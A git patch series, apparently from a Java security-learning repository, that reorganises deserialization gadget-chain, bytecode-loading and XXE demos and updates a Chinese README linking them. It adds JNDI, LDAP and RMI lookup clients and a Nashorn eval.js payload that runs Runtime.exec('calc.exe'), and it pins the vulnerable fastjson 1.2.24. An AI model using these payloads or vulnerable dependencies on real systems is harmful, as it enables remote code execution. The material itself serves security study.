+ + + + com.alibaba + fastjson + 1.2.24 + + + + + org.apache.bcel + bcel + 6.10.0 + + diff --git a/general/src/main/java/com/govuln/beans/Cat.java b/jdk8/src/main/java/com/govuln/beans/Cat.java similarity index 100% rename from general/src/main/java/com/govuln/beans/Cat.java rename to jdk8/src/main/java/com/govuln/beans/Cat.java diff --git a/general/src/main/java/com/govuln/bytes/HelloBCEL.java b/jdk8/src/main/java/com/govuln/bytes/HelloBCEL.java similarity index 100% rename from general/src/main/java/com/govuln/bytes/HelloBCEL.java rename to jdk8/src/main/java/com/govuln/bytes/HelloBCEL.java diff --git a/general/src/main/java/com/govuln/bytes/HelloClassLoader.java b/jdk8/src/main/java/com/govuln/bytes/HelloClassLoader.java similarity index 100% rename from general/src/main/java/com/govuln/bytes/HelloClassLoader.java rename to jdk8/src/main/java/com/govuln/bytes/HelloClassLoader.java diff --git a/general/src/main/java/com/govuln/bytes/HelloDefineClass.java b/jdk8/src/main/java/com/govuln/bytes/HelloDefineClass.java similarity index 100% rename from general/src/main/java/com/govuln/bytes/HelloDefineClass.java rename to jdk8/src/main/java/com/govuln/bytes/HelloDefineClass.java diff --git a/general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java b/jdk8/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java similarity index 100% rename from general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java rename to jdk8/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java diff --git a/jdk8/src/main/java/com/govuln/client/JNDIClient.java b/jdk8/src/main/java/com/govuln/client/JNDIClient.java new file mode 100644 index 0000000..f045cb4 --- /dev/null +++ b/jdk8/src/main/java/com/govuln/client/JNDIClient.java @@ -0,0 +1,14 @@ +package com.govuln.client; + +import javax.naming.Context; +import javax.naming.InitialContext; +import javax.naming.directory.InitialDirContext; +import javax.naming.ldap.InitialLdapContext; +import java.util.Hashtable; + +public class JNDIClient { + public static void main(String[] args) throws Exception { + Context initialContext = new InitialContext(); + initialContext.lookup("ldap://127.0.0.1:389/sample"); + } +} diff --git a/jdk8/src/main/java/com/govuln/client/LDAPClient.java b/jdk8/src/main/java/com/govuln/client/LDAPClient.java new file mode 100644 index 0000000..8f68ba1 --- /dev/null +++ b/jdk8/src/main/java/com/govuln/client/LDAPClient.java @@ -0,0 +1,21 @@ +package com.govuln.client; + +import javax.naming.Context; +import javax.naming.InitialContext; +import javax.naming.NamingException; +import javax.naming.directory.InitialDirContext; +import java.util.Hashtable; + +public class LDAPClient { + public static void main(String[] args) throws NamingException { + Hashtable env = new Hashtable(); + env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.ldap.LdapCtxFactory"); + env.put(Context.SECURITY_AUTHENTICATION, "simple"); + env.put(Context.SECURITY_PRINCIPAL, "user"); + env.put(Context.SECURITY_CREDENTIALS, "password"); + env.put(Context.PROVIDER_URL, "ldap://127.0.0.1:389"); + InitialContext ctx = new InitialDirContext(env); + ctx.lookup("sample"); + ctx.close(); + } +} diff --git a/jdk8/src/main/java/com/govuln/client/RMIClient.java b/jdk8/src/main/java/com/govuln/client/RMIClient.java new file mode 100644 index 0000000..00c6ef2 --- /dev/null +++ b/jdk8/src/main/java/com/govuln/client/RMIClient.java @@ -0,0 +1,9 @@ +package com.govuln.client; + +import java.rmi.Naming; + +public class RMIClient { + public static void main(String[] args) throws Exception { + Naming.lookup("rmi://localhost:1099/test"); + } +} diff --git a/general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections1.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections1.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections1.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections1.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections2.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections2.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections2.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections2.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections3.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections6.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections6.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java diff --git a/general/src/main/java/com/govuln/deserialization/JDK7u21.java b/jdk8/src/main/java/com/govuln/deserialization/JDK7u21.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/JDK7u21.java rename to jdk8/src/main/java/com/govuln/deserialization/JDK7u21.java diff --git a/general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java b/jdk8/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java rename to jdk8/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java diff --git a/general/src/main/java/com/govuln/deserialization/URLDNS.java b/jdk8/src/main/java/com/govuln/deserialization/URLDNS.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/URLDNS.java rename to jdk8/src/main/java/com/govuln/deserialization/URLDNS.java diff --git a/jdk8/src/main/java/com/govuln/js/Eval.java b/jdk8/src/main/java/com/govuln/js/Eval.java new file mode 100644 index 0000000..6c11506 --- /dev/null +++ b/jdk8/src/main/java/com/govuln/js/Eval.java @@ -0,0 +1,20 @@ +package com.govuln.js; + +import javax.script.ScriptEngine; +import javax.script.ScriptEngineManager; +import java.io.FileReader; + +import jdk.nashorn.api.scripting.NashornException; +import jdk.nashorn.api.scripting.NashornScriptEngine; +import jdk.nashorn.api.scripting.NashornScriptEngineFactory; + +import java.io.InputStream; +import java.lang.Exception; + +public class Eval { + public static void main(String[] args) throws Exception { + ScriptEngineManager manager = new ScriptEngineManager(); + ScriptEngine engine = manager.getEngineByName("JavaScript"); + engine.eval(new FileReader("src/main/resources/eval.js")); + } +} diff --git a/general/src/main/java/com/govuln/serialization/Converter.java b/jdk8/src/main/java/com/govuln/serialization/Converter.java similarity index 100% rename from general/src/main/java/com/govuln/serialization/Converter.java rename to jdk8/src/main/java/com/govuln/serialization/Converter.java diff --git a/general/src/main/java/com/govuln/serialization/UserSerialization.java b/jdk8/src/main/java/com/govuln/serialization/UserSerialization.java similarity index 100% rename from general/src/main/java/com/govuln/serialization/UserSerialization.java rename to jdk8/src/main/java/com/govuln/serialization/UserSerialization.java diff --git a/general/src/main/java/com/govuln/serialization/model/User.java b/jdk8/src/main/java/com/govuln/serialization/model/User.java similarity index 100% rename from general/src/main/java/com/govuln/serialization/model/User.java rename to jdk8/src/main/java/com/govuln/serialization/model/User.java diff --git a/general/src/main/java/com/govuln/xxe/DocumentBuilderExample.java b/jdk8/src/main/java/com/govuln/xxe/DocumentBuilderExample.java similarity index 100% rename from general/src/main/java/com/govuln/xxe/DocumentBuilderExample.java rename to jdk8/src/main/java/com/govuln/xxe/DocumentBuilderExample.java diff --git a/general/src/main/java/com/govuln/xxe/SAXParserExample.java b/jdk8/src/main/java/com/govuln/xxe/SAXParserExample.java similarity index 100% rename from general/src/main/java/com/govuln/xxe/SAXParserExample.java rename to jdk8/src/main/java/com/govuln/xxe/SAXParserExample.java diff --git a/general/src/main/java/com/govuln/xxe/XMLReaderExample.java b/jdk8/src/main/java/com/govuln/xxe/XMLReaderExample.java similarity index 100% rename from general/src/main/java/com/govuln/xxe/XMLReaderExample.java rename to jdk8/src/main/java/com/govuln/xxe/XMLReaderExample.java diff --git a/general/src/main/java/com/govuln/xxe/XMLStreamExample.java b/jdk8/src/main/java/com/govuln/xxe/XMLStreamExample.java similarity index 100% rename from general/src/main/java/com/govuln/xxe/XMLStreamExample.java rename to jdk8/src/main/java/com/govuln/xxe/XMLStreamExample.java diff --git a/general/src/main/java/com/govuln/xxe/XPathExpressionExample.java b/jdk8/src/main/java/com/govuln/xxe/XPathExpressionExample.java similarity index 100% rename from general/src/main/java/com/govuln/xxe/XPathExpressionExample.java rename to jdk8/src/main/java/com/govuln/xxe/XPathExpressionExample.java diff --git a/general/src/main/java/evil/EvilTemplatesImpl.java b/jdk8/src/main/java/evil/EvilTemplatesImpl.java similarity index 100% rename from general/src/main/java/evil/EvilTemplatesImpl.java rename to jdk8/src/main/java/evil/EvilTemplatesImpl.java diff --git a/general/src/main/java/evil/Hello.java b/jdk8/src/main/java/evil/Hello.java similarity index 100% rename from general/src/main/java/evil/Hello.java rename to jdk8/src/main/java/evil/Hello.java diff --git a/jdk8/src/main/resources/eval.js b/jdk8/src/main/resources/eval.js new file mode 100644 index 0000000..f80f6b6 --- /dev/null +++ b/jdk8/src/main/resources/eval.js @@ -0,0 +1,4 @@ +var a = new java.beans.Customizer { + setObject: eval +} +a.object = "java.lang.Runtime.getRuntime50円51円.exec50円'calc.exe'51円"; \ No newline at end of file From 9573c899d8a9b7328addef596c85aefedcd722cb Mon Sep 17 00:00:00 2001 From: phith0n Date: Wed, 9 Apr 2025 20:02:05 +0800 Subject: [PATCH 10/10] rename folder name --- README.md | 26 +++++++++++++------------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/README.md b/README.md index d6a7031..870ec80 100644 --- a/README.md +++ b/README.md @@ -29,22 +29,22 @@ 字节码: -- 远程字节码加载Demo:[HelloClassLoader](general/src/main/java/com/govuln/bytes/HelloClassLoader.java) -- 系统默认defineClass加载字节码Demo:[HelloDefineClass](general/src/main/java/com/govuln/bytes/HelloDefineClass.java) -- 使用TemplatesImpl加载字节码Demo:[HelloTemplatesImpl](general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java) -- 使用BCEL加载字节码Demo:[HelloBCEL](general/src/main/java/com/govuln/bytes/HelloBCEL.java) +- 远程字节码加载Demo:[HelloClassLoader](jdk8/src/main/java/com/govuln/bytes/HelloClassLoader.java) +- 系统默认defineClass加载字节码Demo:[HelloDefineClass](jdk8/src/main/java/com/govuln/bytes/HelloDefineClass.java) +- 使用TemplatesImpl加载字节码Demo:[HelloTemplatesImpl](jdk8/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java) +- 使用BCEL加载字节码Demo:[HelloBCEL](jdk8/src/main/java/com/govuln/bytes/HelloBCEL.java) 反序列化: -- 最简单的Transformer Demo:[CommonsCollectionsIntro.java](general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java) -- 我简化的[CommonsCollections6](general/src/main/java/com/govuln/deserialization/CommonsCollections6.java),更方便大家理解 -- 利用TemplatesImpl构造的Transformer Demo:[CommonsCollectionsIntro2.java](general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java) -- 无InvokerTransformer的Transformer Demo:[CommonsCollectionsIntro3.java](general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java) -- 我简化的[CommonsCollections3](general/src/main/java/com/govuln/deserialization/CommonsCollections3.java) -- CommonsCollections6一次执行多个命令:[CommonsCollections6Multiple](general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java) -- 支持commons-collections4.0版本的CommonsCollections6利用链:[CommonsCollections6For4](general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java) -- 我简化的CommonsBeanutils1利用链:[CommonsBeanutils1](general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java) -- 简化版Java原生利用链 [JDK7u21](general/src/main/java/com/govuln/deserialization/JDK7u21.java) +- 最简单的Transformer Demo:[CommonsCollectionsIntro.java](jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java) +- 我简化的[CommonsCollections6](jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6.java),更方便大家理解 +- 利用TemplatesImpl构造的Transformer Demo:[CommonsCollectionsIntro2.java](jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java) +- 无InvokerTransformer的Transformer Demo:[CommonsCollectionsIntro3.java](jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java) +- 我简化的[CommonsCollections3](jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3.java) +- CommonsCollections6一次执行多个命令:[CommonsCollections6Multiple](jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java) +- 支持commons-collections4.0版本的CommonsCollections6利用链:[CommonsCollections6For4](jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java) +- 我简化的CommonsBeanutils1利用链:[CommonsBeanutils1](jdk8/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java) +- 简化版Java原生利用链 [JDK7u21](jdk8/src/main/java/com/govuln/deserialization/JDK7u21.java) Shiro反序列化:

AltStyle によって変換されたページ (->オリジナル) /